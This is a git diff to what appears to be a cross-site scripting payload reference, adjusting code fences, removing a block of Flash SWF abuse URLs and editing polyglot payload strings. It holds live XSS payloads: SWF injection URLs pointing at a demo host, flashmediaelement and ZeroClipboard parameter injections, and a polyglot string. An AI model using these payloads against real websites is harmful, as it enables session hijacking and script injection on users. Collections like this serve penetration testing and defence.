diff --git a/.gitignore b/.gitignore
index c50668505e..aa95f381ff 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,2 +1,3 @@
+BuildPDF/
.vscode
-.todo
\ No newline at end of file
+.todo
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 70fa2ea464..7071b0823c 100644
--- a/XSS injection/README.md
+++ b/XSS injection/README.md
@@ -31,7 +31,7 @@ fclose($fp);
Keylogger for XSS
-```html
+```javascript
```
@@ -238,19 +238,13 @@ XSS in SWF flash application
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
-
-InsecureFlashFile.swf
-location to url: InsecureFlashFile.swf?a=location&c=http://www.google.com/
-open url to new window: InsecureFlashFile.swf?a=open&c=http://www.google.com/
-http request to url: InsecureFlashFile.swf?a=get&c=http://www.google.com/
-eval js codz: InsecureFlashFile.swf?a=eval&c=alert(document.domain)
```
more payloads in ./files
XSS in SWF flash application
-```javascript
+```
flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
@@ -299,7 +293,7 @@ jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//>" >|\>@gmail.com'-->" >">'">
+">>" >|\>@gmail.com'-->" >">'">
```
Polyglot XSS - Mathias Karlsson
@@ -407,10 +401,11 @@ Bypass dot filter